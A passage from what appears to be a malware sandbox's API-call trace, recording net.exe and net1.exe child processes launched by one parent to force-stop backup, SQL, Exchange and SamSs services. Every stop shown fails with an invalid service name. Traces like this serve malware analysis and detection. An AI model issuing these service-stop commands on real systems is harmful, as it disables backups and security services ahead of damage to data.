(_String1="work", _String2="SQLAgent$VEEAMSQL2012") returned 4 [0208.618] _wcsicmp (_String1="wksta", _String2="SQLAgent$VEEAMSQL2012") returned 4 [0208.618] _wcsicmp (_String1="prdr", _String2="SQLAgent$VEEAMSQL2012") returned -3 [0208.618] _wcsicmp (_String1="devrdr", _String2="SQLAgent$VEEAMSQL2012") returned -15 [0208.618] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$VEEAMSQL2012") returned -7 [0208.618] _wcsicmp (_String1="server", _String2="SQLAgent$VEEAMSQL2012") returned -12 [0208.618] _wcsicmp (_String1="svr", _String2="SQLAgent$VEEAMSQL2012") returned 5 [0208.618] _wcsicmp (_String1="srv", _String2="SQLAgent$VEEAMSQL2012") returned 1 [0208.618] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$VEEAMSQL2012") returned -7 [0208.618] _wcsicmp (_String1="alerter", _String2="SQLAgent$VEEAMSQL2012") returned -18 [0208.618] _wcsicmp (_String1="netlogon", _String2="SQLAgent$VEEAMSQL2012") returned -5 [0208.618] _wcsupr (in: _String="SQLAgent$VEEAMSQL2012" | out: _String="SQLAGENT$VEEAMSQL2012") returned="SQLAGENT$VEEAMSQL2012" [0208.618] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5d54f0 [0208.621] GetServiceKeyNameW (in: hSCManager=0x5d54f0, lpDisplayName="SQLAGENT$VEEAMSQL2012", lpServiceName=0xe9aaf0, lpcchBuffer=0x27fd84 | out: lpServiceName="", lpcchBuffer=0x27fd84) returned 0 [0208.621] _wcsicmp (_String1="msg", _String2="SQLAGENT$VEEAMSQL2012") returned -6 [0208.621] _wcsicmp (_String1="messenger", _String2="SQLAGENT$VEEAMSQL2012") returned -6 [0208.621] _wcsicmp (_String1="receiver", _String2="SQLAGENT$VEEAMSQL2012") returned -1 [0208.621] _wcsicmp (_String1="rcv", _String2="SQLAGENT$VEEAMSQL2012") returned -1 [0208.621] _wcsicmp (_String1="redirector", _String2="SQLAGENT$VEEAMSQL2012") returned -1 [0208.621] _wcsicmp (_String1="redir", _String2="SQLAGENT$VEEAMSQL2012") returned -1 [0208.621] _wcsicmp (_String1="rdr", _String2="SQLAGENT$VEEAMSQL2012") returned -1 [0208.621] _wcsicmp (_String1="workstation", _String2="SQLAGENT$VEEAMSQL2012") returned 4 [0208.621] _wcsicmp (_String1="work", _String2="SQLAGENT$VEEAMSQL2012") returned 4 [0208.621] _wcsicmp (_String1="wksta", _String2="SQLAGENT$VEEAMSQL2012") returned 4 [0208.621] _wcsicmp (_String1="prdr", _String2="SQLAGENT$VEEAMSQL2012") returned -3 [0208.621] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$VEEAMSQL2012") returned -15 [0208.622] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$VEEAMSQL2012") returned -7 [0208.622] _wcsicmp (_String1="server", _String2="SQLAGENT$VEEAMSQL2012") returned -12 [0208.622] _wcsicmp (_String1="svr", _String2="SQLAGENT$VEEAMSQL2012") returned 5 [0208.622] _wcsicmp (_String1="srv", _String2="SQLAGENT$VEEAMSQL2012") returned 1 [0208.622] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$VEEAMSQL2012") returned -7 [0208.622] _wcsicmp (_String1="alerter", _String2="SQLAGENT$VEEAMSQL2012") returned -18 [0208.622] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$VEEAMSQL2012") returned -5 [0208.622] NetServiceControl (in: servername=0x0, service="SQLAGENT$VEEAMSQL2012", opcode=0x0, arg=0x0, bufptr=0x27fd80 | out: bufptr=0x27fd80) returned 0x889 [0208.623] wcscpy_s (in: _Destination=0xe9a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0208.623] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0208.623] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe9b338, nSize=0x800, Arguments=0xe99dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0208.624] GetFileType (hFile=0x26c) returned 0x3 [0208.624] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x5d4020 [0208.625] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x5d4020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n\\", lpUsedDefaultChar=0x0) returned 30 [0208.625] WriteFile (in: hFile=0x26c, lpBuffer=0x5d4020, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x27fcc0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27fcc0, lpOverlapped=0x0) returned 0 [0208.625] LocalFree (hMem=0x5d4020) returned 0x0 [0208.625] GetFileType (hFile=0x26c) returned 0x3 [0208.625] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5d62c8 [0208.625] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5d62c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n]", lpUsedDefaultChar=0x0) returned 2 [0208.625] WriteFile (in: hFile=0x26c, lpBuffer=0x5d62c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x27fcc0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27fcc0, lpOverlapped=0x0) returned 0 [0208.625] LocalFree (hMem=0x5d62c8) returned 0x0 [0208.625] _ultow (in: _Dest=0x889, _Radix=2620656 | out: _Dest=0x889) returned="2185" [0208.625] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe9b338, nSize=0x800, Arguments=0xe99dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0208.625] GetFileType (hFile=0x26c) returned 0x3 [0208.625] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5d62c8 [0208.625] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5d62c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0208.625] WriteFile (in: hFile=0x26c, lpBuffer=0x5d62c8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x27fccc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27fccc, lpOverlapped=0x0) returned 0 [0208.625] LocalFree (hMem=0x5d62c8) returned 0x0 [0208.625] GetFileType (hFile=0x26c) returned 0x3 [0208.625] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5d62c8 [0208.625] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5d62c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n]", lpUsedDefaultChar=0x0) returned 2 [0208.625] WriteFile (in: hFile=0x26c, lpBuffer=0x5d62c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x27fccc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27fccc, lpOverlapped=0x0) returned 0 [0208.625] LocalFree (hMem=0x5d62c8) returned 0x0 [0208.626] NetApiBufferFree (Buffer=0x5d1c80) returned 0x0 [0208.636] NetApiBufferFree (Buffer=0x5d1c98) returned 0x0 [0208.636] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$VEEAMSQL2012 /y" [0208.636] exit (_Code=2) Process: id = "264" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6a658000" os_pid = "0xa34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSExchangeMGMT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 437 os_tid = 0x8c0 Process: id = "265" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4dc75000" os_pid = "0xa28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "264" os_parent_pid = "0xa34" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeMGMT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 438 os_tid = 0xb0 [0208.768] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xefad4 | out: lpSystemTimeAsFileTime=0xefad4*(dwLowDateTime=0x45a04a60, dwHighDateTime=0x1d57a87)) [0208.768] GetCurrentProcessId () returned 0xa28 [0208.768] GetCurrentThreadId () returned 0xb0 [0208.768] GetTickCount () returned 0x116dc9a [0208.768] QueryPerformanceCounter (in: lpPerformanceCount=0xefacc | out: lpPerformanceCount=0xefacc*=32905280508) returned 1 [0208.768] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0208.768] __set_app_type (_Type=0x1) [0208.768] __p__fmode () returned 0x74eb31f4 [0208.769] __p__commode () returned 0x74eb31fc [0208.769] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0208.769] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0208.769] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0208.769] GetConsoleOutputCP () returned 0x1b5 [0208.769] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0208.769] SetThreadUILanguage (LangId=0x0) returned 0x409 [0208.772] sprintf_s (in: _DstBuf=0xefa8c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0208.772] setlocale (category=0, locale=".437") returned="English_United States.437" [0208.774] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0208.774] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0208.774] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeMGMT /y" [0208.774] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xef858, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0208.774] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x0, Size=0x70) returned 0x4c3c18 [0208.774] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0208.775] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xefa5c | out: Buffer=0xefa5c*=0x4c1c78) returned 0x0 [0208.775] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xefa5c | out: Buffer=0xefa5c*=0x4c1c90) returned 0x0 [0208.775] _fileno (_File=0x74eb2900) returned -2 [0208.775] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0208.775] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0208.775] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0208.775] _wcsicmp (_String1="config", _String2="stop") returned -16 [0208.775] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0208.775] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0208.775] _wcsicmp (_String1="file", _String2="stop") returned -13 [0208.775] _wcsicmp (_String1="files", _String2="stop") returned -13 [0208.775] _wcsicmp (_String1="group", _String2="stop") returned -12 [0208.775] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0208.775] _wcsicmp (_String1="help", _String2="stop") returned -11 [0208.775] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0208.775] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0208.775] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0208.775] _wcsicmp (_String1="session", _String2="stop") returned -15 [0208.775] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0208.775] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0208.775] _wcsicmp (_String1="share", _String2="stop") returned -12 [0208.775] _wcsicmp (_String1="start", _String2="stop") returned -14 [0208.775] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0208.775] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0208.775] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0208.776] _wcsicmp (_String1="accounts", _String2="MSExchangeMGMT") returned -12 [0208.776] _wcsicmp (_String1="computer", _String2="MSExchangeMGMT") returned -10 [0208.776] _wcsicmp (_String1="config", _String2="MSExchangeMGMT") returned -10 [0208.776] _wcsicmp (_String1="continue", _String2="MSExchangeMGMT") returned -10 [0208.776] _wcsicmp (_String1="cont", _String2="MSExchangeMGMT") returned -10 [0208.776] _wcsicmp (_String1="file", _String2="MSExchangeMGMT") returned -7 [0208.776] _wcsicmp (_String1="files", _String2="MSExchangeMGMT") returned -7 [0208.776] _wcsicmp (_String1="group", _String2="MSExchangeMGMT") returned -6 [0208.776] _wcsicmp (_String1="groups", _String2="MSExchangeMGMT") returned -6 [0208.776] _wcsicmp (_String1="help", _String2="MSExchangeMGMT") returned -5 [0208.776] _wcsicmp (_String1="helpmsg", _String2="MSExchangeMGMT") returned -5 [0208.776] _wcsicmp (_String1="localgroup", _String2="MSExchangeMGMT") returned -1 [0208.776] _wcsicmp (_String1="pause", _String2="MSExchangeMGMT") returned 3 [0208.776] _wcsicmp (_String1="session", _String2="MSExchangeMGMT") returned 6 [0208.776] _wcsicmp (_String1="sessions", _String2="MSExchangeMGMT") returned 6 [0208.776] _wcsicmp (_String1="sess", _String2="MSExchangeMGMT") returned 6 [0208.776] _wcsicmp (_String1="share", _String2="MSExchangeMGMT") returned 6 [0208.776] _wcsicmp (_String1="start", _String2="MSExchangeMGMT") returned 6 [0208.776] _wcsicmp (_String1="stats", _String2="MSExchangeMGMT") returned 6 [0208.776] _wcsicmp (_String1="statistics", _String2="MSExchangeMGMT") returned 6 [0208.776] _wcsicmp (_String1="stop", _String2="MSExchangeMGMT") returned 6 [0208.776] _wcsicmp (_String1="time", _String2="MSExchangeMGMT") returned 7 [0208.776] _wcsicmp (_String1="user", _String2="MSExchangeMGMT") returned 8 [0208.776] _wcsicmp (_String1="users", _String2="MSExchangeMGMT") returned 8 [0208.776] _wcsicmp (_String1="msg", _String2="MSExchangeMGMT") returned 2 [0208.776] _wcsicmp (_String1="messenger", _String2="MSExchangeMGMT") returned -14 [0208.776] _wcsicmp (_String1="receiver", _String2="MSExchangeMGMT") returned 5 [0208.776] _wcsicmp (_String1="rcv", _String2="MSExchangeMGMT") returned 5 [0208.776] _wcsicmp (_String1="netpopup", _String2="MSExchangeMGMT") returned 1 [0208.776] _wcsicmp (_String1="redirector", _String2="MSExchangeMGMT") returned 5 [0208.776] _wcsicmp (_String1="redir", _String2="MSExchangeMGMT") returned 5 [0208.776] _wcsicmp (_String1="rdr", _String2="MSExchangeMGMT") returned 5 [0208.776] _wcsicmp (_String1="workstation", _String2="MSExchangeMGMT") returned 10 [0208.776] _wcsicmp (_String1="work", _String2="MSExchangeMGMT") returned 10 [0208.776] _wcsicmp (_String1="wksta", _String2="MSExchangeMGMT") returned 10 [0208.776] _wcsicmp (_String1="prdr", _String2="MSExchangeMGMT") returned 3 [0208.776] _wcsicmp (_String1="devrdr", _String2="MSExchangeMGMT") returned -9 [0208.776] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeMGMT") returned -1 [0208.777] _wcsicmp (_String1="server", _String2="MSExchangeMGMT") returned 6 [0208.777] _wcsicmp (_String1="svr", _String2="MSExchangeMGMT") returned 6 [0208.777] _wcsicmp (_String1="srv", _String2="MSExchangeMGMT") returned 6 [0208.777] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeMGMT") returned -1 [0208.777] _wcsicmp (_String1="alerter", _String2="MSExchangeMGMT") returned -12 [0208.777] _wcsicmp (_String1="netlogon", _String2="MSExchangeMGMT") returned 1 [0208.777] _wcsupr (in: _String="MSExchangeMGMT" | out: _String="MSEXCHANGEMGMT") returned="MSEXCHANGEMGMT" [0208.777] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4c54d8 [0208.780] GetServiceKeyNameW (in: hSCManager=0x4c54d8, lpDisplayName="MSEXCHANGEMGMT", lpServiceName=0x3faaf0, lpcchBuffer=0xef9f8 | out: lpServiceName="", lpcchBuffer=0xef9f8) returned 0 [0208.780] _wcsicmp (_String1="msg", _String2="MSEXCHANGEMGMT") returned 2 [0208.780] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEMGMT") returned -14 [0208.780] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEMGMT") returned 5 [0208.780] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEMGMT") returned 5 [0208.780] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEMGMT") returned 5 [0208.780] _wcsicmp (_String1="redir", _String2="MSEXCHANGEMGMT") returned 5 [0208.780] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEMGMT") returned 5 [0208.780] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEMGMT") returned 10 [0208.780] _wcsicmp (_String1="work", _String2="MSEXCHANGEMGMT") returned 10 [0208.780] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEMGMT") returned 10 [0208.780] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEMGMT") returned 3 [0208.780] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEMGMT") returned -9 [0208.781] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEMGMT") returned -1 [0208.781] _wcsicmp (_String1="server", _String2="MSEXCHANGEMGMT") returned 6 [0208.781] _wcsicmp (_String1="svr", _String2="MSEXCHANGEMGMT") returned 6 [0208.781] _wcsicmp (_String1="srv", _String2="MSEXCHANGEMGMT") returned 6 [0208.781] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEMGMT") returned -1 [0208.781] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEMGMT") returned -12 [0208.781] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEMGMT") returned 1 [0208.781] NetServiceControl (in: servername=0x0, service="MSEXCHANGEMGMT", opcode=0x0, arg=0x0, bufptr=0xef9f4 | out: bufptr=0xef9f4) returned 0x889 [0208.782] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0208.782] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0208.782] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0208.783] GetFileType (hFile=0x26c) returned 0x3 [0208.783] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x4c4008 [0208.784] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x4c4008, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0208.784] WriteFile (in: hFile=0x26c, lpBuffer=0x4c4008, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xef934, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xef934, lpOverlapped=0x0) returned 0 [0208.784] LocalFree (hMem=0x4c4008) returned 0x0 [0208.784] GetFileType (hFile=0x26c) returned 0x3 [0208.784] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4c62b0 [0208.784] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4c62b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nL", lpUsedDefaultChar=0x0) returned 2 [0208.784] WriteFile (in: hFile=0x26c, lpBuffer=0x4c62b0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xef934, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xef934, lpOverlapped=0x0) returned 0 [0208.784] LocalFree (hMem=0x4c62b0) returned 0x0 [0208.784] _ultow (in: _Dest=0x889, _Radix=981348 | out: _Dest=0x889) returned="2185" [0208.784] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0208.784] GetFileType (hFile=0x26c) returned 0x3 [0208.784] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4c62b0 [0208.784] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4c62b0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0208.784] WriteFile (in: hFile=0x26c, lpBuffer=0x4c62b0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xef940, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xef940, lpOverlapped=0x0) returned 0 [0208.784] LocalFree (hMem=0x4c62b0) returned 0x0 [0208.784] GetFileType (hFile=0x26c) returned 0x3 [0208.784] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4c62b0 [0208.784] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4c62b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nL", lpUsedDefaultChar=0x0) returned 2 [0208.784] WriteFile (in: hFile=0x26c, lpBuffer=0x4c62b0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xef940, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xef940, lpOverlapped=0x0) returned 0 [0208.784] LocalFree (hMem=0x4c62b0) returned 0x0 [0208.785] NetApiBufferFree (Buffer=0x4c1c78) returned 0x0 [0208.785] NetApiBufferFree (Buffer=0x4c1c90) returned 0x0 [0208.785] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeMGMT /y" [0208.785] exit (_Code=2) Process: id = "266" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x69d5d000" os_pid = "0xa04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SamSs /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 439 os_tid = 0x8f4 Process: id = "267" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4b736000" os_pid = "0x964" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "266" os_parent_pid = "0xa04" cmd_line = "C:\\Windows\\system32\\net1 stop SamSs /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 440 os_tid = 0x9f0 [0209.050] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2dfe1c | out: lpSystemTimeAsFileTime=0x2dfe1c*(dwLowDateTime=0x45cb2320, dwHighDateTime=0x1d57a87)) [0209.050] GetCurrentProcessId () returned 0x964 [0209.050] GetCurrentThreadId () returned 0x9f0 [0209.050] GetTickCount () returned 0x116ddb2 [0209.050] QueryPerformanceCounter (in: lpPerformanceCount=0x2dfe14 | out: lpPerformanceCount=0x2dfe14*=32933516569) returned 1 [0209.051] GetModuleHandleA (lpModuleName=0x0) returned 0x9a0000 [0209.051] __set_app_type (_Type=0x1) [0209.051] __p__fmode () returned 0x74eb31f4 [0209.051] __p__commode () returned 0x74eb31fc [0209.051] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x9affe6) returned 0x0 [0209.051] __getmainargs (in: _Argc=0x9b9064, _Argv=0x9b906c, _Env=0x9b9068, _DoWildCard=0, _StartInfo=0x9b9024 | out: _Argc=0x9b9064, _Argv=0x9b906c, _Env=0x9b9068) returned 0 [0209.051] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0209.051] GetConsoleOutputCP () returned 0x1b5 [0209.051] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x9b9080 | out: lpCPInfo=0x9b9080) returned 1 [0209.052] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.054] sprintf_s (in: _DstBuf=0x2dfdd4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0209.055] setlocale (category=0, locale=".437") returned="English_United States.437" [0209.057] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0209.057] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0209.057] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SamSs /y" [0209.057] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2dfba0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0209.057] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x5e) returned 0x3d3bf0 [0209.057] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0209.057] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2dfda4 | out: Buffer=0x2dfda4*=0x3d1c50) returned 0x0 [0209.057] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2dfda4 | out: Buffer=0x2dfda4*=0x3d1c68) returned 0x0 [0209.057] _fileno (_File=0x74eb2900) returned -2 [0209.057] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0209.057] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0209.057] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0209.057] _wcsicmp (_String1="config", _String2="stop") returned -16 [0209.057] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0209.057] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0209.057] _wcsicmp (_String1="file", _String2="stop") returned -13 [0209.057] _wcsicmp (_String1="files", _String2="stop") returned -13 [0209.057] _wcsicmp (_String1="group", _String2="stop") returned -12 [0209.057] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0209.058] _wcsicmp (_String1="help", _String2="stop") returned -11 [0209.058] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0209.058] _wcsicmp (_String1="localgroup", _String2="stop") 